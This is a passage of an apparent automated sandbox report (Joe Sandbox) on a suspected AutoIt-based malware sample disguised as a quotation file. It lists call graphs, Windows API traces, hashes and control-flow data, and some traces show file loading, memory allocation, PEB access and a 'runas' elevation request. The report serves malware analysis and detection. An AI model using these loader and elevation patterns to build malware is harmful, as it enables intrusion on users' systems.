97836 f1db11 PeekMessageW 97835->97836 97837 f1d807 GetInputState 97835->97837 97838 f1d9d5 97835->97838 97840 f61cbe TranslateAcceleratorW 97835->97840 97841 f1db8f PeekMessageW 97835->97841 97842 f1da04 timeGetTime 97835->97842 97843 f1db73 TranslateMessage DispatchMessageW 97835->97843 97844 f1dbaf Sleep 97835->97844 97845 f62b74 Sleep 97835->97845 97847 f61dda timeGetTime 97835->97847 97861 f1ec40 207 API calls 97835->97861 97862 f21310 207 API calls 97835->97862 97866 f1dd50 97835->97866 97873 f1dfd0 97835->97873 97896 f1bf40 207 API calls 2 library calls 97835->97896 97897 f2edf6 IsDialogMessageW GetClassLongW 97835->97897 97899 f83a2a 23 API calls 97835->97899 97900 f8359c 82 API calls __wsopen_s 97835->97900 97836->97835 97837->97835 97837->97836 97840->97835 97841->97835 97842->97835 97843->97841 97864 f1dbc0 97844->97864 97845->97864 97846 f2e551 timeGetTime 97846->97864 97898 f2e300 23 API calls 97847->97898 97850 f62c0b GetExitCodeProcess 97851 f62c37 CloseHandle 97850->97851 97852 f62c21 WaitForSingleObject 97850->97852 97851->97864 97852->97835 97852->97851 97853 f62a31 97853->97838 97854 fa29bf GetForegroundWindow 97854->97864 97856 f62ca9 Sleep 97856->97835 97861->97835 97862->97835 97864->97835 97864->97838 97864->97846 97864->97850 97864->97853 97864->97854 97864->97856 97901 f95658 23 API calls 97864->97901 97902 f7e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97864->97902 97903 f7d4dc 47 API calls 97864->97903 97867 f1dd83 97866->97867 97868 f1dd6f 97866->97868 97905 f8359c 82 API calls __wsopen_s 97867->97905 97904 f1d260 207 API calls 2 library calls 97868->97904 97870 f1dd7a 97870->97835 97872 f62f75 97872->97872 97874 f1e010 97873->97874 97892 f1e0dc messages 97874->97892 97908 f30242 5 API calls __Init_thread_wait 97874->97908 97877 f62fca 97879 f1a961 22 API calls 97877->97879 97877->97892 97878 f1a961 22 API calls 97878->97892 97880 f62fe4 97879->97880 97909 f300a3 29 API calls __onexit 97880->97909 97884 f62fee 97910 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97884->97910 97887 f1ec40 207 API calls 97887->97892 97888 f8359c 82 API calls 97888->97892 97890 f1a8c7 22 API calls 97890->97892 97891 f204f0 22 API calls 97891->97892 97892->97878 97892->97887 97892->97888 97892->97890 97892->97891 97893 f1e3e1 97892->97893 97906 f1a81b 41 API calls 97892->97906 97907 f2a308 207 API calls 97892->97907 97911 f30242 5 API calls __Init_thread_wait 97892->97911 97912 f300a3 29 API calls __onexit 97892->97912 97913 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97892->97913 97914 f947d4 207 API calls 97892->97914 97915 f968c1 207 API calls 97892->97915 97893->97835 97896->97835 97897->97835 97898->97835 97899->97835 97900->97835 97901->97864 97902->97864 97903->97864 97904->97870 97905->97872 97906->97892 97907->97892 97908->97877 97909->97884 97910->97892 97911->97892 97912->97892 97913->97892 97914->97892 97915->97892 97916 f48402 97921 f481be 97916->97921 97919 f4842a 97926 f481ef try_get_first_available_module 97921->97926 97923 f483ee 97940 f427ec 26 API calls __wsopen_s 97923->97940 97925 f48343 97925->97919 97933 f50984 97925->97933 97929 f48338 97926->97929 97936 f38e0b 40 API calls 2 library calls 97926->97936 97928 f4838c 97928->97929 97937 f38e0b 40 API calls 2 library calls 97928->97937 97929->97925 97939 f3f2d9 20 API calls _abort 97929->97939 97931 f483ab 97931->97929 97938 f38e0b 40 API calls 2 library calls 97931->97938 97941 f50081 97933->97941 97935 f5099f 97935->97919 97936->97928 97937->97931 97938->97929 97939->97923 97940->97925 97942 f5008d CallCatchBlock 97941->97942 97943 f5009b 97942->97943 97945 f500d4 97942->97945 97999 f3f2d9 20 API calls _abort 97943->97999 97952 f5065b 97945->97952 97946 f500a0 98000 f427ec 26 API calls __wsopen_s 97946->98000 97951 f500aa __wsopen_s 97951->97935 98002 f5042f 97952->98002 97955 f506a6 98020 f45221 97955->98020 97956 f5068d 98034 f3f2c6 20 API calls _abort 97956->98034 97959 f506ab 97961 f506b4 97959->97961 97962 f506cb 97959->97962 97960 f50692 98035 f3f2d9 20 API calls _abort 97960->98035 98036 f3f2c6 20 API calls _abort 97961->98036 98033 f5039a CreateFileW 97962->98033 97966 f506b9 98037 f3f2d9 20 API calls _abort 97966->98037 97968 f50781 GetFileType 97969 f507d3 97968->97969 97970 f5078c GetLastError 97968->97970 98042 f4516a 21 API calls 2 library calls 97969->98042 98040 f3f2a3 20 API calls __dosmaperr 97970->98040 97971 f50756 GetLastError 98039 f3f2a3 20 API calls __dosmaperr 97971->98039 97973 f50704 97973->97968 97973->97971 98038 f5039a CreateFileW 97973->98038 97975 f5079a CloseHandle 97975->97960 97977 f507c3 97975->97977 98041 f3f2d9 20 API calls _abort 97977->98041 97979 f50749 97979->97968 97979->97971 97981 f507f4 97983 f50840 97981->97983 98043 f505ab 72 API calls 3 library calls 97981->98043 97982 f507c8 97982->97960 97987 f5086d 97983->97987 98044 f5014d 72 API calls 4 library calls 97983->98044 97986 f50866 97986->97987 97988 f5087e 97986->97988 97989 f486ae __wsopen_s 29 API calls 97987->97989 97990 f500f8 97988->97990 97991 f508fc CloseHandle 97988->97991 97989->97990 98001 f50121 LeaveCriticalSection __wsopen_s 97990->98001 98045 f5039a CreateFileW 97991->98045 97993 f50927 97994 f50931 GetLastError 97993->97994 97995 f5095d 97993->97995 98046 f3f2a3 20 API calls __dosmaperr 97994->98046 97995->97990 97997 f5093d 98047 f45333 21 API calls 2 library calls 97997->98047 97999->97946 98000->97951 98001->97951 98003 f50450 98002->98003 98008 f5046a 98002->98008 98003->98008 98055 f3f2d9 20 API calls _abort 98003->98055 98006 f5045f 98056 f427ec 26 API calls __wsopen_s 98006->98056 98048 f503bf 98008->98048 98009 f504d1 98019 f50524 98009->98019 98059 f3d70d 26 API calls 2 library calls 98009->98059 98010 f504a2 98010->98009 98057 f3f2d9 20 API calls _abort 98010->98057 98013 f5051f 98015 f5059e 98013->98015 98013->98019 98014 f504c6 98058 f427ec 26 API calls __wsopen_s 98014->98058 98060 f427fc 11 API calls _abort 98015->98060 98018 f505aa 98019->97955 98019->97956 98021 f4522d CallCatchBlock 98020->98021 98063 f42f5e EnterCriticalSection 98021->98063 98023 f4527b 98064 f4532a 98023->98064 98024 f45234 98024->98023 98025 f45259 98024->98025 98030 f452c7 EnterCriticalSection 98024->98030 98027 f45000 __wsopen_s 21 API calls 98025->98027 98029 f4525e 98027->98029 98028 f452a4 __wsopen_s 98028->97959 98029->98023 98067 f45147 EnterCriticalSection 98029->98067 98030->98023 98031 f452d4 LeaveCriticalSection 98030->98031 98031->98024 98033->97973 98034->97960 98035->97990 98036->97966 98037->97960 98038->97979 98039->97960 98040->97975 98041->97982 98042->97981 98043->97983 98044->97986 98045->97993 98046->97997 98047->97995 98050 f503d7 98048->98050 98049 f503f2 98049->98010 98050->98049 98061 f3f2d9 20 API calls _abort 98050->98061 98052 f50416 98062 f427ec 26 API calls __wsopen_s 98052->98062 98054 f50421 98054->98010 98055->98006 98056->98008 98057->98014 98058->98009 98059->98013 98060->98018 98061->98052 98062->98054 98063->98024 98068 f42fa6 LeaveCriticalSection 98064->98068 98066 f45331 98066->98028 98067->98023 98068->98066 98069 15ff108 98083 15fcd38 98069->98083 98071 15ff1b7 98086 15feff8 98071->98086 98073 15ff1e0 CreateFileW 98075 15ff234 98073->98075 98082 15ff22f 98073->98082 98076 15ff24b VirtualAlloc 98075->98076 98075->98082 98077 15ff26c ReadFile 98076->98077 98076->98082 98078 15ff287 98077->98078 98077->98082 98079 15fdda8 12 API calls 98078->98079 98080 15ff2a1 98079->98080 98081 15fdff8 GetPEB GetPEB 98080->98081 98081->98082 98089 16001f8 GetPEB 98083->98089 98085 15fd3c3 98085->98071 98087 15ff001 Sleep 98086->98087 98088 15ff00f 98087->98088 98090 1600222 98089->98090 98090->98085 98091 f63a41 98095 f810c0 98091->98095 98093 f63a4c 98094 f810c0 53 API calls 98093->98094 98094->98093 98096 f810fa 98095->98096 98100 f810cd 98095->98100 98096->98093 98097 f810fc 98107 f2fa11 53 API calls 98097->98107 98098 f81101 98101 f17510 53 API calls 98098->98101 98100->98096 98100->98097 98100->98098 98104 f810f4 98100->98104 98102 f81108 98101->98102 98103 f16350 22 API calls 98102->98103 98103->98096 98106 f1b270 39 API calls 98104->98106 98106->98096 98107->98098 98108 f11cad SystemParametersInfoW

                                                                                                                    Executed Functions

                                                                                                                    Function 00F142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 234 f142de-f1434d call f1a961 GetVersionExW call f16b57 239 f53617-f5362a 234->239 240 f14353 234->240 241 f5362b-f5362f 239->241 242 f14355-f14357 240->242 243 f53631 241->243 244 f53632-f5363e 241->244 245 f53656 242->245 246 f1435d-f143bc call f193b2 call f137a0 242->246 243->244 244->241 247 f53640-f53642 244->247 250 f5365d-f53660 245->250 260 f143c2-f143c4 246->260 261 f537df-f537e6 246->261 247->242 249 f53648-f5364f 247->249 249->239 252 f53651 249->252 253 f53666-f536a8 250->253 254 f1441b-f14435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 259 f536ae-f536b1 253->259 257 f14494-f1449a 254->257 258 f14437 254->258 262 f1443d-f14449 257->262 258->262 263 f536b3-f536bd 259->263 264 f536db-f536e5 259->264 260->250 267 f143ca-f143dd 260->267 268 f53806-f53809 261->268 269 f537e8 261->269 272 f53824-f53828 GetSystemInfo 262->272 273 f1444f-f1445e LoadLibraryA 262->273 265 f536bf-f536c5 263->265 266 f536ca-f536d6 263->266 270 f536e7-f536f3 264->270 271 f536f8-f53702 264->271 265->254 266->254 274 f143e3-f143e5 267->274 275 f53726-f5372f 267->275 279 f537f4-f537fc 268->279 280 f5380b-f5381a 268->280 276 f537ee 269->276 270->254 277 f53715-f53721 271->277 278 f53704-f53710 271->278 281 f14460-f1446e GetProcAddress 273->281 282 f1449c-f144a6 GetSystemInfo 273->282 284 f5374d-f53762 274->284 285 f143eb-f143ee 274->285 286 f53731-f53737 275->286 287 f5373c-f53748 275->287 276->279 277->254 278->254 279->268 280->276 288 f5381c-f53822 280->288 281->282 289 f14470-f14474 GetNativeSystemInfo 281->289 283 f14476-f14478 282->283 294 f14481-f14493 283->294 295 f1447a-f1447b FreeLibrary 283->295 292 f53764-f5376a 284->292 293 f5376f-f5377b 284->293 290 f53791-f53794 285->290 291 f143f4-f1440f 285->291 286->254 287->254 288->279 289->283 290->254 298 f5379a-f537c1 290->298 296 f14415 291->296 297 f53780-f5378c 291->297 292->254 293->254 295->294 296->254 297->254 299 f537c3-f537c9 298->299 300 f537ce-f537da 298->300 299->254 300->254
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00F1430D
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00FACB64,00000000,?,?), ref: 00F14422
                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F14429
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F14454
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F14466
                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F14474
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F1447B
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00F144A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                                    • Opcode ID: b45b968ed44afe1f05002fefd3b2417dc22b3b71b28490602c96512c7a8dfaf3
                                                                                                                    • Instruction ID: 51194602facef63a8965b1a133724d907a3b7dd2fc2b2ce9e28b598ab67fc5c6
                                                                                                                    • Opcode Fuzzy Hash: b45b968ed44afe1f05002fefd3b2417dc22b3b71b28490602c96512c7a8dfaf3
                                                                                                                    • Instruction Fuzzy Hash: 1DA1A376D0A2CCCFC711CBAF7CC06D97FA47B66751B184899D8819BA22D2305948FB72
                                                                                                                    Function 00F142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 529 f142a2-f142ba CreateStreamOnHGlobal 530 f142da-f142dd 529->530 531 f142bc-f142d3 FindResourceExW 529->531 532 f142d9 531->532 533 f535ba-f535c9 LoadResource 531->533 532->530 533->532 534 f535cf-f535dd SizeofResource 533->534 534->532 535 f535e3-f535ee LockResource 534->535 535->532 536 f535f4-f535fc 535->536 537 f53600-f53612 536->537 537->532
                                                                                                                    APIs
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F150AA,?,?,00000000,00000000), ref: 00F142B2
                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F150AA,?,?,00000000,00000000), ref: 00F142C9
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00F150AA,?,?,00000000,00000000,?,?,?,?,?,?,00F14F20), ref: 00F535BE
                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00F150AA,?,?,00000000,00000000,?,?,?,?,?,?,00F14F20), ref: 00F535D3
                                                                                                                    • LockResource.KERNEL32(00F150AA,?,?,00F150AA,?,?,00000000,00000000,?,?,?,?,?,?,00F14F20,?), ref: 00F535E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: SCRIPT
                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                    • Opcode ID: fc3e8caa0ba3bb2016c0943d4b805790c6eaf1d4bd68380417fb98b2627d0343
                                                                                                                    • Instruction ID: 55108f33f8696cdf5bef9ccb9002af7ab4335e8ad1987d307619fe4832273368
                                                                                                                    • Opcode Fuzzy Hash: fc3e8caa0ba3bb2016c0943d4b805790c6eaf1d4bd68380417fb98b2627d0343
                                                                                                                    • Instruction Fuzzy Hash: 35118EB1600705BFD7218B65DC48F677BBAEBC6B51F144169F402D6290DB71EC40A670
                                                                                                                    Function 00F52BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F12B6B
                                                                                                                      • Part of subcall function 00F13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FE1418,?,00F12E7F,?,?,?,00000000), ref: 00F13A78
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00FD2224), ref: 00F52C10
                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,00FD2224), ref: 00F52C17
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                    • String ID: runas
                                                                                                                    • API String ID: 448630720-4000483414
                                                                                                                    • Opcode ID: bafd94b8747a47d83843e1055c4a11b2d4143c4a7d255c021c19ed7e4783ba54
                                                                                                                    • Instruction ID: 4526e7ddff3981e8f505b1054f47390f9dac1f28d704779a06767caad0942dff
                                                                                                                    • Opcode Fuzzy Hash: bafd94b8747a47d83843e1055c4a11b2d4143c4a7d255c021c19ed7e4783ba54
                                                                                                                    • Instruction Fuzzy Hash: 2911D2316083456AC704FF61DC519EE77A5ABD2320F44042EB182021A3CF388A89B792
                                                                                                                    Function 00F1D730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetInputState.USER32 ref: 00F1D807
                                                                                                                    • timeGetTime.WINMM ref: 00F1DA07
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1DB28
                                                                                                                    • TranslateMessage.USER32(?), ref: 00F1DB7B
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00F1DB89
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1DB9F
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00F1DBB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2189390790-0
                                                                                                                    • Opcode ID: c90490efd21c24dde66b5628a0e7a5718fb738c36c6fd0eb3028414664fcc61f
                                                                                                                    • Instruction ID: d85022a5f0556fc360c59c29fa677eb79349a246dd6b6011493b58027e717df8
                                                                                                                    • Opcode Fuzzy Hash: c90490efd21c24dde66b5628a0e7a5718fb738c36c6fd0eb3028414664fcc61f
                                                                                                                    • Instruction Fuzzy Hash: 2E42F371A08745DFD728CF24C884BAAB7F4BF86324F54461DE4568B291D778E884FB82
                                                                                                                    Function 00F12CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F12D07
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00F12D31
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F12D42
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00F12D5F
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F12D6F
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00F12D85
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F12D94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: 1585319b0ed6bcd605fdfb697eeeb635f7a8fa625b3a50fd664d22ea9878c0f1
                                                                                                                    • Instruction ID: c74e6594abcf0b4346f7fe5cb5e37f6e87bf728f36c7e7559c50c4f7054fc0d6
                                                                                                                    • Opcode Fuzzy Hash: 1585319b0ed6bcd605fdfb697eeeb635f7a8fa625b3a50fd664d22ea9878c0f1
                                                                                                                    • Instruction Fuzzy Hash: BE21C0B591125CAFDB00DFA5E889BEDBBB4FB09700F00811AF511AA2A0D7B55544EFA1
                                                                                                                    Function 00F5065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 302 f5065b-f5068b call f5042f 305 f506a6-f506b2 call f45221 302->305 306 f5068d-f50698 call f3f2c6 302->306 311 f506b4-f506c9 call f3f2c6 call f3f2d9 305->311 312 f506cb-f50714 call f5039a 305->312 313 f5069a-f506a1 call f3f2d9 306->313 311->313 321 f50716-f5071f 312->321 322 f50781-f5078a GetFileType 312->322 323 f5097d-f50983 313->323 327 f50756-f5077c GetLastError call f3f2a3 321->327 328 f50721-f50725 321->328 324 f507d3-f507d6 322->324 325 f5078c-f507bd GetLastError call f3f2a3 CloseHandle 322->325 330 f507df-f507e5 324->330 331 f507d8-f507dd 324->331 325->313 339 f507c3-f507ce call f3f2d9 325->339 327->313 328->327 332 f50727-f50754 call f5039a 328->332 336 f507e9-f50837 call f4516a 330->336 337 f507e7 330->337 331->336 332->322 332->327 345 f50847-f5086b call f5014d 336->345 346 f50839-f50845 call f505ab 336->346 337->336 339->313 352 f5086d 345->352 353 f5087e-f508c1 345->353 346->345 351 f5086f-f50879 call f486ae 346->351 351->323 352->351 355 f508c3-f508c7 353->355 356 f508e2-f508f0 353->356 355->356 358 f508c9-f508dd 355->358 359 f508f6-f508fa 356->359 360 f5097b 356->360 358->356 359->360 361 f508fc-f5092f CloseHandle call f5039a 359->361 360->323 364 f50931-f5095d GetLastError call f3f2a3 call f45333 361->364 365 f50963-f50977 361->365 364->365 365->360
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F5039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F50704,?,?,00000000,?,00F50704,00000000,0000000C), ref: 00F503B7
                                                                                                                    • GetLastError.KERNEL32 ref: 00F5076F
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F50776
                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00F50782
                                                                                                                    • GetLastError.KERNEL32 ref: 00F5078C
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F50795
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F507B5
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F508FF
                                                                                                                    • GetLastError.KERNEL32 ref: 00F50931
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F50938
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                    • Opcode ID: d511e2fe65402bc191fc0b4d97c93ca4a4cfdf16ee2dda939366c50059d87c02
                                                                                                                    • Instruction ID: dba7ddd01e981a15924fcf054e8a03e996bff51637816122926a387ffe51bcfc
                                                                                                                    • Opcode Fuzzy Hash: d511e2fe65402bc191fc0b4d97c93ca4a4cfdf16ee2dda939366c50059d87c02
                                                                                                                    • Instruction Fuzzy Hash: 65A11532E001488FDF19AF68DC91BAE3BA0EB46321F140159FD159F392DF35991AEB91
                                                                                                                    Function 00F1344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FE1418,?,00F12E7F,?,?,?,00000000), ref: 00F13A78
                                                                                                                      • Part of subcall function 00F13357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F13379
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F1356A
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F5318D
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F531CE
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F53210
                                                                                                                    • _wcslen.LIBCMT ref: 00F53277
                                                                                                                    • _wcslen.LIBCMT ref: 00F53286
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
